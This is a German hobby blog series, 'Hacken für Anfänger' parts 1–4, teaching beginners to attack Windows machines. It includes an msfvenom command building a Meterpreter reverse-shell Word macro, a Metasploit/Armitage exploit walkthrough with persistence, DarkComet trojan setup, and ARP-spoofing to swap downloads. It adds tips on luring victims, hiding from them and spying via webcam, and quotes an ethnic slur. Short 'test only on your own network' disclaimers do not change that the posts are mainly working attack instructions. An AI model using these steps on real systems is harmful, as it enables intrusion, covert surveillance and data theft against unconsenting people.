Patrick's World - Hacken für Anfänger

"Hacken" für Anfänger Teil 4 - Microsoft Word

Patrick — Mon, 08 Feb 2016 13:47:49 +0000

Danke Microsoft!

Wem das Betriebssystem noch nicht unsicher genug ist, der sollte eventuell zusätzlich auf Microsoftoffice setzen.
Denn heute zeige ich euch wie ihr eine schädliches Worddokument erstellen könnt.
Was wir nutzen sind Makros. Vielleicht hat der eine oder andere bereits von Makroviren gehört.
Makros sind grundsätzlich für gewisse Funktionen in einem Worddokument gedacht. Also z.B. um einen
Druckauftrag auszuführen oder diverse Formularfunktionen. Allerdings bringen sie wieder Zahlreiche
Sicherheitslücken mit sich.

Heute erstellen wir den Makrocode mit Kali Linux und anschließend unser schadhaftes Worddokument.
Wer neu hier ist, sollte zuerst „Hacken für Anfänger“ Teil 1 und 2 und 3 lesen.

=======================================================================
An dieser Stelle wieder die Moralpeitsche:

Wir testen bitte alles nur in unserem Netzwerk. Spionieren keine anderen aus usw.
Ihr kennt das ja aus den anderen Tutorials. Ich denke ich zeige euch einfach noch ein paar unterschiedliche Sicherheitslücken und zum Schluss zeige ich euch, wie ihr euch etwas besser
Schützen könnt.

Also. Let's go.

=======================================================================

Als erstes öffnet ihr ein Terminal und überprüft eure IP-Adresse. Das kennt ihr ja bereits.

Also einfach

ifconfig eingeben…

Anschließen gebt ihr folgenden Befehl in die Konsole ein:

lsfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.5.50 LPORT=8080 -e x86/shikata_ga_nai -f vba-exe

Die Angriffsarten können dabei in einer Vielzahl variieren. In unserem Fall baut der Opfer PC eine Verbindung (reverse_tcp) zu uns auf über den Port 8080. Grundsätzlich könnte man aber auch alle anderen möglichen Befehle einbauen. Also die Festplatte verschlüsseln oder Dateien herunterladen
oder was auch immer. Da könnt ihr selbst kreativ sein. Für Heute soll uns diese Variante genügen. Außerdem wollen wir ja keinen wirklichen Schaden anrichten.

Wenn alles funktioniert hat, bekommt ihr bald folgende Ausgabe:

Scrollt einfach in der Konsole hoch und kopiert die Makrobefehle/Mmakrodata in eine Textdatei.
Zusätzlich noch den kompletten Text unter PAYLOAD DATA

In der Textdatei sieht das dann folgender Maßen aus:

Kopiert die Textdatei auf einen USB Stick oder was auch immer. Denn jetzt brauchen wir einen Windows PC mit Office 2013.
In meinem Falle ein ist es ein Win10 PC. Dort öffnet ihr ein leeres Worddokument und sucht (bei mir rechts oben) das Makrofeld.
Legt einen willkürlichen Namen fest (bei mir ist es test) und klickt auf erstellen.

Dort löscht ihr die paar Zeilen die bereits drin stehen raus und kopiert jetzt unsere vorher erstellten Makrobefehle komplett rein.

Speichert das ganze ab und könnte bereits jetzt schon die neu erstellten Funktionen erkennen.

Anschließend könnt ihr das Makrofenster schließen.
Jetzt haben wir noch die PAYLOAD DATA / Makrodata.

Einfach ein weiteres mal aus unser vorher erstellten Datei den Text kopieren und als normalen Text reinkopieren.

Das wars schon. Jetzt braucht ihr das ganze nur noch abspeichern. Am besten ihr gebt der Datei noch einen schönen Namen,
damit unser Opfer auch etwas motiviert wird, das Ding zu Öffnen. Ich hab es einfach unter dem Namen „passwörter“ abgespeichert.

In meinem Fall gab es eine Warnung bei dem Speichern der Datei. Deshalb musste ich zum Speichern den Virenscanner ausschalten. Macht aber auch nichts.
Denn wir sind ja grundsätzlich die Angreifer. Wie das Worddokument dann seinen Weg zum Opfer findet ist wieder jedem selber überlassen. ZB. Über das
Downloadaustauschen wie bereits bei Teil 1 gezeigt oder per Mail oder einfach auf einem USB-Stick. Oder ihr gebt die Datei in einem Netzwerk frei und wartet,
bis ein „Schlauer“ Vorbeikommt und eure Datei öffnet. Grundsätzlich könnte man das Ganze auch etwas eleganter verstecken etc. Hier soll es aber nur um die
doch recht einfache Möglichkeit gehen, solche Worddokumente zu erstellen.

Also ab zum Test...

Auf dem Angreifer PC, also unser Kalilinux müssen wir noch Bescheid geben, wo das Programm auf unsere Opfer warten soll. In unserem Falle der Port 8080.

Also einfach

Armitage → Listeners → Reverse (wait for)

und bei der Abfrage den Port 8080 angeben.

Der Listener sollte damit starten.

Anschließend müsst ihr nur einmal die Worddatei auf dem OpferPC doppelklicken.

Und das wars dann schon.

Den Rest spare ich mir an dieser Stelle, da ich das schon beim letzten Mal gezeigt hatte.
Ihr habt auf jeden Fall wieder alle Möglichkeiten. Also Daten kopieren, verschlüsseln, löschen, Passwörter auslesen, Keylogger, Webcamshots, Screenshots…

Mit der kostenlosen alternative Libreoffice oder Openoffice wäre das übrigens nicht passiert ;)

Danke nochmal an Microsoft. Mit Windows 10 können wir uns endlich sicher fühlen.
Und das Offeice 365 Home kostet nur 10€ pro Monat. Also schlagt zu, wer weiß ob das immer für 120€ zu haben ist ;)

Hurra….

Macht kein Misst Kinder!

MFG Patrick

Tags:

Hacken für Anfänger

"Hacken" für Anfänger Teil 3 - Goodbye WinXP

Patrick — Sun, 07 Feb 2016 11:25:51 +0000

Hallo liebe Windows Freunde,

heute beschäftigten wir uns mit Exploits.

Was sind Exploits? Ganz einfach. Es sind Sicherheitslücken, die beim Programmieren nicht
berücksichtigt wurden. Und genau die nutzen viele Hacker aus. Bevorzugt dabei natürlich unter
Windows, grundsätzlich existieren die aber für alle Betriebssysteme. Also z.B. auch unter Android
oder IOS.

Opensource? Den Begriff dürften die meisten von euch bereits einmal gehört haben und wird häufig mit Freeware verwechselt.
Was bedeutet das?
Opensource wird häufig als kostenlos verstanden, was es auch meistens ist. Allerdings ist es durchaus möglich,
das man auch dafür Geld bezahlen muss. Opensource bedeutet nur das der Quelltext (also der Programmtext) für jedermann
einsehbar und lesbar ist.

Freeware dagegen ist kostenlos, allerdings sieht man da häufig nicht den Programmcode.

Was hat das mit dem heutigen Thema zu tun? Ganz einfach. Unter Linux und anderer Opensourcesoftware,
kann man den Quelltext einsehen und somit auch sehen, was das Programm im Hintergrund eigentlich macht
und ob es vielleicht schlampig programmiert ist und somit eventuelle Schwachstellen erkennen.

Microsoft & Co. Behalten natürlich ihren Programmcode für sich und verschleiern ihn zusätzlich, damit möglichst
niemand den Code einsehen kann. Das Problem dabei. Man erkennt nicht ohne weiteres Sicherheitslücken.
Wenn einer glaubt das wäre gut, der irrt. Denn sobald ein Hacker eine Schwachstelle findet ist Feierabend.
Unter anderen Umständen hätte eventuell ein WhiteHacker bereits vorher die Lücke entdeckt und geschlossen.

So viel zur Theorie…

Doch jetzt wollen wir bekannte Sicherheitslücken nutzen. Ich hoffe euch wird am ende klar, warum
man immer alle Programme aktuell halten sollte.

Die heutige Sicherheitslücke ist insofern der Knaller, da sie von WinXP bis Win10 bestand.
Auch wenn diese für fast alle geschlossen wurde, so gibt es immer noch genügend Windows XP-Rechner und
auch genügend die ihr System nicht immer aktualisieren. Denn wie bereits das letzte Mal schon erwähnt,
wurde diese Sicherheitslücke nicht mehr für XP geschlossen und existiert bis heute.

Die folge davon ist, das nur ein XP-Rechner auf unsere Webseite kommen muss oder wir leiten ihn gezielt im Netzwerk um.
Wie das geht, weißt ihr ja bereits.

Für unseren heutigen Test benutzen wir Kalilinux. Eine Linuxdistribution, die extra für Pentesting (Penetrationtesting)
zusammengestellt wurde. Mit dem kann man so ziemlich alles machen, was sich das Hackerherz (oder Skriptkiddieherz)
nur wünschen kann. Und da das Motto „Hacken für Anfänger“ erhalten bleiben soll, geht das wieder ganz einfach mit einer
grafischen Oberfläche ohne große Konsolenkenntnisse.

Als erstes müsst ihr euch Kalilinux hier herunterladen:
https://www.kali.org/

Danach könnt ihr das einfach auf einen Usb-stick installieren und vom USB-Stick starten. Wenn jemand das nicht hin
bekommen sollte, dann gebt mir einfach Bescheid, dann zeige ich euch, wie ihr euer kleines virtuelles Netzwerk aufbauen
könnt und euch einen USB-Stick erstellen könnt.

======================================================================================================

Und wie immer die Moralpeitsche. An dieser Stelle weise ich ausdrücklich darauf hin, das ihr die Angriffe verstehen
sollt um euch davor zu schützen. Wenn ihr das selber austestet, macht das
bitte nur im eigenen Netzwerk an euren TestPCs. Denn wie es schon bei Spider-Man heißt:

„Aus großer Macht folgt große Verantwortung“

Also. Baut bitte keinen Misst mit dem neuen Wissen. Datendiebstahl & Co sind kein Kavaliersdelikt!!

Und jetzt los. Let's go.

======================================================================================================

Wir benutzen heute Metasploit und Armitage. Metasploit ist einfach eine riesige Sammlung von Exploits und Armitage ist
eine grafische Oberfläche, damit es auch wirklich jedes Kind beherrschen kann.

Als erstes öffnen wir wieder eine Konsole und schauen kurz nach unserer eigenen IP-Adresse.
Das macht ihr wie gewohnt mit dem Befehl

ifconfig

Die merkt ihr euch oder lasst das Fenster einfach geöffnet.

Im Anschluss drückt ihr auf das schrullige Mädchen am linken Rand.
Dadurch wird Armitage gestartet. Eventuelle Fragen einfach mit Ja weiter klicken.
Ihr könnt die Voreinstellungen also so lassen wie sie sind.

Im Anschluss öffnet ihr oben im Menü Hosts → Nmap Scan → Ping Scan. Grundsätzlich funktionieren auch alle anderen Methoden.
Aber in meinem Falle geht der einfach super schnell.

Da wir vorher die IP-Adresse bereits untersucht hatten (in meinem Falle 192.168.5.41) tauscht ihr die letzte Zahl
durch eine 0/24. Das bedeutet das ihr das gesamte Netzwerk durchsucht.

Wenn ihr euer Netzwerk nach Opfern durchsucht habt, sollten auch die PCs angezeigt werden.

Wie

ihr seht ist die Anzahl von Möglichen Exploits gigantisch. Wir beschränken uns aber heute auf den Exploit
der immer noch für WinXP und die nicht aktualisieren anderen WinPCs existiert.

Jetzt geht ihr links auf Exploits → windows → browser → ms14_064_ole_execution.

Ihr werdet beim nächsten Fenster nach weiteren Einstellungen gefragt. Das einzige was ihr ändern müsst ist das Feld LHOST.
In meinem Falle

statt 10.0.2.15 die 192.168.5.41. Also eure IP die wir zum Anfang ermittelt haben.

Nachher bekommt ihr die IP-Adresse von unserem soeben erstellten Schadwareserver. Grundsätzlich könnte das jede Webseite sein.
Ich könnte das also auch in Patricksworld etc. im Hintergrund laufen lassen. Und glaubt mir. So seriöse Pornoseiten haben
so etwas ohne Ende im Hintergrund laufen. Heute geht’s ja nur um die Demonstration. Ihr könntet das Opfer mit unseren
alten Methoden natürlich im eigenen Netzwerk auch einfach auf die „Website“ umleiten.

Egal. In meinem Falle ist es auf jedenfall die Adresse https://192.168.5.41:8080/omg
Sobald das Opfer warum auch immer diese Seite ansteuert ist es vorbei. Wie ihr unschwer erkennen könnt hab ich mein Opfer
bereits auf die Seite geleitet und wir bekommen direkt die Rückmeldung in unserem Programm.

--> Meterpreter session 1 opened

Wir haben bereits jetzt die volle Kontrolle über den PC.
Allerdings funktioniert der Angriff nur so lange wie das Opfer den Browser offen hat. Das heißt wir wollen natürlich
dauerhaft den PC übernehmen. Profis würden das natürlich automatisieren. Doch da wir nur Anfänger sind, müssen wir das
per Hand machen.

Einfach rechte Maustaste → Meterpreter → Acces → Persist

Und das war es schon. Sobald das Opfer den PC neu startet sind wir wieder automatisch auf dem Opfer PC aufgeschaltet.

Wir haben jetzt also die Zeit der Welt uns auszutoben.

Also Daten kopieren, hoch und runter laden. Webcam übernehmen. Die Prozesse anzeigen lassen. Halt alles was ihr wollt.

Hier noch ein Paar Bilder:

Dateibrowser:

Bildschirmscreenshot:

Prozesse anzeigen und steuern.

Nur abschließend. Genau diese Lücke bestand schon seit Jahren bei allen Windows-Versionen.
Hurra. Danke Microsoft.
Also. Falls es wirklich noch WinXP Benutzer unter euch gibt. Bitte Installiert euch ein sicheres Betriebssystem.
Windows ist in Puncto Sicherheit schlimm genug. Aber WinXP ist in der heutigen Zeit einfach nur verboten.
Vielleicht denkt der eine oder andere doch einmal über einen Betriebssystemwechsel nach.

MFG Patrick

Tags:

Hacken für Anfänger

"Hacken" für Anfänger Teil 2 - Das Trojanische Pferd

Patrick — Fri, 29 Jan 2016 15:04:07 +0000

Hallo liebe Hobby Hacker und Skript-kiddies.

Heute geht es weiter mit Teil 2 unserer Serie „Hacken“ für Anfänger.

Vorab. Wer nicht den Teil eins gelesen hat, sollte damit jetzt anfangen.
Dort haben wir nur ganz grob ein paar Grundlagen geschaffen und
auch erklärt, warum ich hier ganz grob die Methoden versuche für den
PC-Anfänger zu erklären.

Heute geht es darum unseren eigenen kleinen Trojaner zu erstellen.

Ich denke die meisten von euch wissen bereits was das sein soll. Für den
Rest ganz kurz. Ich muss dazu kurz Stromberg zitieren, der sich da auch
mit Solchen Themen sehr intensiv befasst.

...
Der ... kann Kaffee, Döner, Bauchtanz
Mehr nicht. Das ist kein Vorurteil, sondern historisch erwiesen.
Die alten Griechen, die haben historisch was geleistet, aber der ..., da wird es eng
...

Warum? Weil ein Trojanisches Pferd in der griechischen Mythologie ein Holzpferd war,
wo die alten Griechen die kleinsten Soldaten reingesteckt haben,
welche dann nach Troja einkehren konnten und die Türen und Tore öffneten.
Dannach haben sie noch ordentlich einen Getrunken, sich über die Trojanischen Frauen herrgemacht
und die Burg besetzt.

Das Trojanische Pferd von Heute.

Ihr seht. Die Masche ist alt, aber dennoch in der heutigen Zeit beliebt.
Denn genau das gleiche machen wir heute. Wir erstellen ein Programm,
tarnen es und wenn es einmal auf dem System ausgeführt wird, können wir uns ein Bier aufmachen,
Fotos ansehen und mit etwas Glück bekommen wir noch eine Webcam liveshow. Zugegeben.
In Troja war das wahrscheinlich etwas spannender. Aber was solls. Lieber Cybersex als gar kein Sex.
Man nimmt, was man bekommt ;)

WIR SIND DIE GUTEN!!

An dieser Stelle noch ganz kurz die Moralpeitsche. Wir wollen hier Angriffe lernen und verstehen,
damit wir uns zum Schluss schützen können. Also bitte benehmt euch und testet das nur an dem
EIGENEN PC im EIGENEM Netzwerk. Alles andere ist strafbar und sau unnötig. Außerdem sollte
wirklich jeder Virenscanner unsere Datei erkennen. Wenn das bei jemand nicht der Fall ist,
sollte man definitv das Virenprogramm wechseln!
Vorab. Wir müssen für unseren kleinen Versuch den Virenscanner abschalten.
Aber. Wenn setzt euch noch ein zusätzliches Testsystem auf.
Führt den Trojaner auf keinen Fall auf eurem PC aus. Auch wenn der relativ harmlos ist und
nur verbindung zu eurem PC aufnimmt, so setzt sich das Ding ordentlich in euer System fest.
Und es ist umständlich das Ding wieder zu löschen. Dann hilft auch das nachträgliche Wiederanschalten
von eurem Scanner nichts! Das muss man dann manuell alles löschen. Und das ist nerfick. Allerdings ist das Tool,
was ich euch heute dazu vorstelle, wie auch bei dem letzten Mal, von einer IT-Sicherheitsfirma.
Es gibt auch ein entsprechendes Gegentool. Also Finger weg, von PC's die ihr nachher weiter verwenden wollt.
Zum Testen. Ladet euch einfach Virtualbox runter. Das ist kostenlos und gibt es für jedes Betriebssystem.

Außerdem könnt ihr euch alle Windowsversionen kostenlos schon vorinstalliert bei Microsoft runter laden.
Hier dazu der Link: https://dev.windows.com/en-us/microsoft-edge/tools/vms/windows/

Einfach die runtergeladene Datei entpacken und und bei Virtualbox auf Importieren drücken.
Bei den Netzwerkeinstellungen in Virtualbox müsst ihr noch auf „Netzwerkbrücke“ umschalten.
Dann könnt ihr auch schon loslegen. Falls ihr dazu auch ein Tuturial wollt,
dann schreibt das hier einfach in die Kommentare.

Jetzt geht’s aber wirklich los.

Es gibt unendlich viele „Trojaner-Baukästen“, damit auch dem technisch nicht versierten die
Möglichkeit gegeben wird, seine Freundin oder was auch immer aus zu spionieren.
Einer der einfachsten und dazu noch sehr effektiven ist der „Dark-Comet“.
Ladet euch das Tool einfach unter diesem Link: https://sourceforge.net/projects/darkcomet/ herrunter.

Schaltet den Virenscanner ab. Denn sonst funktioniert das nicht einmal auf dem Angreifer PC.
Der Baukasten richtet aber keine Schäden auf eurem Rechner an. Und es muss ein Windows PC sein.
Bei mir hat es allerdings sogar unter Linux mit WINE funktioniert. Könnte also auch unter Mac OSX funktionieren.

Der Ablauf:

1.Virenscanner abschalten

2. Programm starten

3. Oben links aufs Menü drücken. Server module -> Full Editor

4. Setzt einfach die Haken wie auf den Bildern

5. Bei der IP-Adresse muss eure IP vom Angreifer-PC rein. Das hatten wir schon das letzte mal
Unter Windows -> Kommandozeile auf: ipconfig eingeben. Unter Linux/Mac OSX ifconfig

6. Der Port

... ist völlig hupe. Sollte nur nicht gerade 80 oder 443 sein. Oder 21,22. Also nehmt einfach
den gleichen wie ich und gut ist.

Da wir ja Grundlagen erlernen wollen. Eurer PC und eure Firewall (häufig der Router) kommuniziert über Ports. Also kleine Türchen. Wenn alle geschlossen sind, gehen also
keine Daten übers Netzwerk rein oder raus. Aber das macht natürlich reichlich wenig Sinn.
Der Port 80 ist z.B. der Standartport für das Internet. Macht also reichlich wenig Sinn diesen zu schließen. In meinem Bild seht ihr das ich für den Angriff den Port 1604 nutze. Das heißt also
unser kleiner Trojaner für Arme öffnet bei dem Opfer den Port 1604 um zu uns eine Verbindung aufzubauen. Es gibt da wieder reichlich viele unterschiedliche Varianten, die den Rahmen unserer kleinen Serie sprengen würde. Wir benutzen eine Reverse connection. Das heißt unser Opfer nimmt
Kontakt zu uns auf. Das hat den Vorteil, das wir so bestehende Firewalls umgehen können, wenn z.B. “alle” eingehenden Blockiert werden.

7. Danach wieder weiter fleißig Haken setzen. Ich gehe mal davon aus das die meisten von euch
der Englischen Sprache halb wegs mächtig sind. Dann ist das echt alles selbsterklärend. Die anderen
setzten einfach brav die Haken wie in meinen Bildern.

Kleiner Tipp:
lasst den Haken bei Persistence installation weg. Denn das bedeutet nur, das unsere
Schaddatei jedes mal zurück kommt. Der Virus an sich ist eh im System integriert, so
das er bei jedem Hochfahren startet. Wenn ihr den Haken weglasst, löscht sich nämlich
die sichtbare Datei selbstständig und das Opfer sieht überhaupt nicht mehr was abgeht.

Ich könnte zwar noch einige Punkte erklären, aber das dauert sonst undendlich lange. Und wir wollen
ja endlich Nacktbilder sehen. Also klickt euch durch bis zu dem Punkt Generate und fertig.

Jetzt haben wir unseren ersten kleinen Trojaner. Ein anderes Mal zeige ich euch, wie man auch
einen Trojaner in jedes “gutartige” Programm einschleusen kann. Das heißt das Euer Opfer
keinen blassen Schimmer hat, das eurer VLC Player sich gerade selbständig macht. Oder noch besser man tarnt das ding im Virenscanner.
Wir testen das einfach das nächste Mal. Wäre schon witzig. Der Virenverseuchte Virenscanner.

8. Wir müssen unserem Progamm noch sagen, auf welchen Port wir warten.
Einfach obem im Menü +Listen to new port drücken und den Port den ihr vorher angegeben
habt dort eintragen. In meinem Fall also der 1604.

Und fertig.

So. Jetzt ist natürlich die Frage groß, wie wir das Ding jetzt auf unseren Opfer PC übertragen können. Klar. Man schickt einen link zum Download oder hängt es an eine Email an. Aber da sagt sich jetzt vielleicht die hälfte. So dumm ist niemand. Ja, Ja. Ihr Klugscheißer.

Wir sind auch nicht so 0815 Skriptkiddies. Wenn nur einer von euch beim letzten Mal aufgepasst hätte, wüsste er selber was zu tun ist. Denn ihr müsst schon etwas kreativ sein.
Also. Wir manipulieren einfach unser Netzwerk. Die App vom letzten Mal macht das kinderleicht.
Da gibt es die Option Download abfangen und ersetzen. Das heißt. Unser Opfer bewegt sich ganz normal durchs Netzt. Sieht alle Seiten Original. Die einzige Auffälligkeit ist die Dateigröße. Der Name etc. ist alles das gleiche. Selbst, wenn das Opfer versucht von der Herstellerseite das Ding runter zu laden.
Das heißt. Egal, was für eine Datei geladen wird. Sie wird ersetzt durch unsere. So sieht das ganze dann aus.

Jetzt dürft ihr euch euer Belohnungsbier öffnen. Denn ab jetzt wird es witzig.

Sobald euer Opfer zum ersten Mal das Programm gestartet hat, habt ihr vollen Zugriff auf das System.
Wären wir richtige Hacker könnten wir jetzt natürlich über die Konsole webcam aktivieren und daten Hochladen.
Aber wir sind leider nur Skript-Kiddies. Macht aber nix, denn das Programm
bringt alle Funktionen Über eine Menüleiste für uns. Einfach das Opfer aussuchen und los gehts.

Einfach die Webcam aktivieren. Nachrichten schicken. Bilder klauen oder hochladen. Oder nur das Mikro anschalten,
denn das hat ja bekanntlich keine leuchte. Egal. Was ihr wollt. Wer meint es sei ihm egal, ob ihm da
einer zusieht oder was weiß ich. Bedenkt, das der Angreifer auch eure Virenschleuder als Angriffs-PC
nutzen kann.

Naja. Das solls für heute gewesen sein. Wie gesagt. Das ist hier alles super verkürzt dargestellt.
In Wirklichkeit steckt da etwas mehr dahinter. Aber wie ihr sehen könnt, ist es wirklich nicht schwer
mit nur zwei kleinen Programmen. Und wenn man mal davon absieht, das wir das übers Netzwerk gemacht haben.
Es würde natürlich auch die Möglichkeit bestehen, das euch einer sowas Draufknallt, wenn ihr euren
laptop kurz unbeaufsichtigt stehen lasst!

Beim nächsten Mal, zeige ich euch, warum es eine wirklich schlechte Idee ist, auf Windows zu setzten.
Und noch schlimmer. Falls irgendjemand noch einen Windowsxp PC besitzt. Macht das Ding platt.
Denn ich zeige beim nächsten Mal eine Sicherheitslücke die für WinXP nicht mehr geschlossen wird.
Das heißt die besteht weiterhin und ab nächste Woche wissen es dann sogar die 10 Blogleser wie man die Kiste hochnimmt.
Allerdings dann endlich mal mit meinem geliebten Linux.

Also. Haut rein. Und macht keinen Quatsch!

MFG Patrick

Tags:

Hacken für Anfänger

"Hacken" für Anfänger Teil 1

Patrick — Sun, 24 Jan 2016 16:27:51 +0000

Hallo liebe Freunde des gepflegten Internetblogs.

Heute und auch die nächsten Wochen, soll es ausnahmsweise mal über
PC's gehen. Vielleicht hat der eine oder andere von euch einmal
Mr. Robot gesehen. Im Großen und Ganzen geht es um einen Hacker
der sich gegen einen der größten Konzerne stellt. Wer die Serie
noch nicht gesehen hat, sollte das jetzt nachholen.

Doch ich will euch nicht mit so einer schnöden Serie langweilen.
Nein. Ich nehme wie immer meinen Bildungsauftrag war. Die Serie
zeigt den Hacker, wie er in Netzwerke einbricht und auch sonst
so den einen oder anderen hackt. Leider lassen sie den unwissenden
Zuschauer im dunkeln tappen und erklären nicht einmal wie er das macht.

Im TV sieht das immer so einfach aus und vielleicht fragt sich dann
auch der Eine oder Andere, ob das wirklich so einfach geht.

Und vorab. Jap. Jedes 10 Jährige Kind mit einem Smartphone könnte die
meisten Sachen selbstständig machen.
Es gibt nur 3 Bedingungen die ihr erfüllen müsst.

1. Kauft euch einen schwarzen Hoodie. Denn den besitzt jeder seriöse
Hacker. Auch ich muss den immer zuerst anziehen, bevor ich eine
Schwachstelle nutze. Daran erkennt man auch stets die Hacker. Entweder am
schwarzen Hoodie oder an der "Guy Fawkes" Maske.
Da aber nur die Anonymous die Maske benutzen, könnt ihr euch eher auf
den schwarzen Hoodie verlassen.

2. Ihr bestitz ein Smartphone (ich meine damit ein richtiges mit Android
und Rootzugriff) oder Laptop oder irgendein gerät mit Bildschirm.
Vermutlich würde sogar ein gerooteter Android-TV funktionieren.

3. Lest regelmäßig meinen Blog. Denn ich versuche euch hier wirklich
Kindgerecht ein paar Grundlagen zu erklären.

An dieser Stelle will ich euch nochmal ins Gewissen reden.

Das Spionieren und Manipulieren von Netzwerken ist kein Kavaliersdelikt.
Genauso wenig Identitätsdiebstahl. Geht also bitte sicher, das ihr in
eurem eigenen Netzwerk unterwegs seid und das ihr nicht euren Mitbewohner
oder ähnliches beim pornostreamen stört. Denn der kann auch ganz schnell
mal wütend werden. Außerdem steht ihr ab jetzt unter Generalverdacht.

Denn jedes mal, wenn etwas nicht funktioniert wird man euch vorwerfen ihr
hättet schon wieder die Finger im Spiel gehabt. Und nur zur Info. Ich war
nur einmal im Wohnheim für ne kleine aber witzige Störung verantwortlich.

Mein Ziel ist es euch zu zeigen, wie einfach es geht Netzwerke zu manipulieren
und Sicherheitslücken aus zu nutzen, damit ihr euch der Gefahr in fremden
Netzwerken und auf irgendwelchen zwielichtigen Internetseiten im Klaren seit.
Außerdem wird nach den nächsten Wochen der Ein oder Andere sich vielleicht doch
nochmal überlegen, ob er wirklich sein geliebtes Windows unbedingt braucht
oder ob er sich doch mit meinem geliebten Linux oder Apple (das liebe ich nicht)
anfreunden kann.

Nach den nächsten Wochen, werdet ihr mit Sicherheit keine Hacker werden. Im besten
Fall sind wir dann Scriptkiddies in schwarzen Hoodies. Vorab schonmal einen kleinen
Überblick was wir gemeinsam erarbeiten werden.

-Netzwerke Manipulieren + Daten abfangen und mitschneiden
-in Netzwerke eindringen
-RFID-Karten (wie z.B. unsere Mensaar Karte) knacken und kopieren
-unserer eigenen kleinen Trojaner erstellen
-PC's inkl. Webcam kontrollieren
-Wenn ihr noch wünsche über irgendwas spezielles habt, dann schreibt
das bitte unten in den Kommentaren. Dann zeige ich (falls ich dazu in der
lage bin) Euch natürlich auch gerne andere "Hacks".

Ich hoffe das überzeugt euch in den nächsten Wochen, die Windowskisten platt zu machen.

Also lets go. Hoodie an. Es geht ans Eingemachte.

Wir beginnen mit einer kleinen Runde zum Erwärmen. Netzwerkgrundlagen und
Manipulation.
Grundsätzlich funktioniert das mit allen Betriebssystem. Und sobald jemand Interresse
hat, zeuge ich euch auch wie man das am PC macht. Fragt einfach im Kommentarfeld nach.
Da wir aber heute schnelle Erfolge wünschen, fangen wir mit einer kleinen Handyapp an.
Denn die nimmt uns eigentlich alles ab. Dennoch machen wir etwas Theorieunterricht.

Ich lege mit Absicht keinen großen Wert, auf die vollständige technische Korrektheit
um es so einfach wie es geht zu erklären. Also an alle Klugscheißer vor weg. Das
ist hier für Kleinkinder und blutige Amateure.

Wie funktioniert ein Netzwerk?

MAC-Adresse (Media-Access-Control-Adresse):

Grundsätzlich besitzt jede Netzwerkkarte eine Hersteller Nummer. Diese nennt man
MAC-Adresse (Media-Access-Control-Adresse). Also egal ob ihr eine Ethernetdose
am PC habt oder ein Wlanstick. Diese Nummer ist grundsätzlich immer eindeutig und
vom Hersteller fest vergeben. Diese sieht dann z.B: so aus: 00:80:41:ae:fd:7e

Der Router / Gateway

Ihr habt ein Gerät was euch ins Internet bringt und den Netzwerkverkehr regelt.
Dieser überprüft die Geräte im Netzwerk. Vergibt eine IP-Adresse und sendet euch
die Pakete (Daten). Die Daten von dem Router werden immer an die MAC-Adresse von
eurem PC geschickt. Grundsätzlich werden die Gateway's in einer Art Tabelle gespeichert.
Diese nennt man Address Resolution Protocol (ARP).

Ich entschuldige mich schon vorab für meine zeichnerischen Fähigkeiten. Ich beherrsche
das Zeichnen ähnlich gut wie die deutsche Rechtschreibung. Aber dennoch versteht man
glaub ich meistens, was damit gemeint ist. Hier seht ihr ein Netzwerk, wie es normaler
Weise funktionieren soll.

Das Problem an dieser Stelle ist, das die MAC-Adresse vom jeweiligen Betriebssystem
übermittelt wird und nicht Hardwareseitig. Also lässt diese sich kinderleicht verändern.
Und das ebenfalls unter jedem Betriebssystem.

Das Ziel mit unserem Angriff ist es uns jetzt dazwischen zu schalten. Also zwischen den
Router und dem PC. Wir sagen also dem PC Das wir auch ein Gateway sind. Und dem Router
täuschen wir vor, das wir die gleiche MAC-Adresse haben, wie der Opfer-PC.

Das nennt man Man-in-the-Middle-Angriff (kurz: MITM-Angriff). Die Methode ist uralt,
aber immernoch sehr effektiv.

Das heißt also. Jeglicher unverschlüsselter Netzwerkverkehr geht durch unseren Rechner.
Das bedeutet gleichzeitig, das wir uns ansehen können was der andere gerade macht.
Und alle Passwörter die unverschlüsselt übermittelt werden, können dadurch mitgelesen werden.
außerdem ist es auch möglich unverschlüsselte Sitzungen zu übernehmen. Natürlich können wir
auch beliebig die Seiten bearbeiten und theoretisch unseren Schadcode einfügen. Doch das ein
anderes Mal. Heute ersetzten wir einfach nur alle Bilder auf der angezeigten Webseite.

So viel zur Theorie. Ab zur Praxis.

In meinem Netzwerk habe ich über Virtualbox einen Windows XP PC im einsatzt. Demnächst
werde ich vielleicht mal einen ApplePC dran glauben lassen. Wie gesagt. Das funktioniert
bei jedem Betriebssystem. Da kann das "gute" alte Win XP nichts dafür.

Ihr benötigt auf jeden Fall ein gerootetes Android Gerät.
Ladet euch die App Zanti 2.2 hier runter
und installiert sie euch auf euer Telefon.

Damit ihr euch die IP Adresse von eurem PC anzeigen könnt öffnet einfach eine Konsole.

Unter Windows kann man ipconfig eingeben. Unter linux (und ich glaube auch bei MacOSX)
einfach ifconfig eingeben.
Eure Gateways ("Router") könnt ihr euch mit arp -a anzeigen lassen.

Im folgenden Bild seht ihr die Ausgabe ohne Manipulation.

Jetzt starten wir die App.

Ihr solltet natürlich mit eurem Wlan verbunden sein ;)

Akzeptiert die AGB's und könnt mit dem scannen starten.

Nun seht ihr bereits die Geräte im Netzwerk.
- Einfach das Opfer auswählen.
- Man in the Middle auswählen.
- Schalter auf On legen.
- Bild zum Ersetzten auswählen.

OK. Beim Opfer sieht das ganze dann so aus:

Wie ihr oben erkennen könnt. Sind jetzt auch zwei Gateways in der ARP-Tabelle zu
finden.

OK. Das ist jetzt nur ein harmloses Bild was wir ausgetauscht haben. Wie gesagt. Es
verdeutlicht nur, das wir jede Seite manipulieren können. Und somit auch Schadcode
einfügen können. Dazu kommen wir aber erst später meine jungen Schüler.

Also. Wenn ihr Fragen habt, dann ab in die Kommentare. Ich Zeige euch bei Interrese
gerne wie man das am PC genauso hinbekommt. Aber für später müssen wir uns eh alle
gemeinsam mit Linux grundlagen befassen. Deswegen Denke ich für heute reicht das zu.

Und denkt dran. So witzig wie das ist. Macht so ein Quatsch nur bei euch zu Hause,
auch wenn das Problemlos genauso gut an der Uni funktioniert.

Was Übrigens noch eine kleine Empfehlung ist.
Bei Lanpartys kommt das Richtig gut. Denn ich wollte mein Team ein Wenig unterstützen.
Da es mir aber an LOL Skills fehlt, hab ich halt nach und nach immer wieder einzellne
Leute aus dem gegnerischen Team auf Eis gelegt. Und ihr habt keine Ahnung wie wütend
Zocker werden können, wenn es laggt. Es war wirklich wie ein Konzert aus Maulerei.
Und ihr seid dabei auch noch der Dirigent.

...Phantastisch...

Kleiner Tipp. Nehmt immer den der sich am lautesten aufregt. Denn der ist dann schon vor
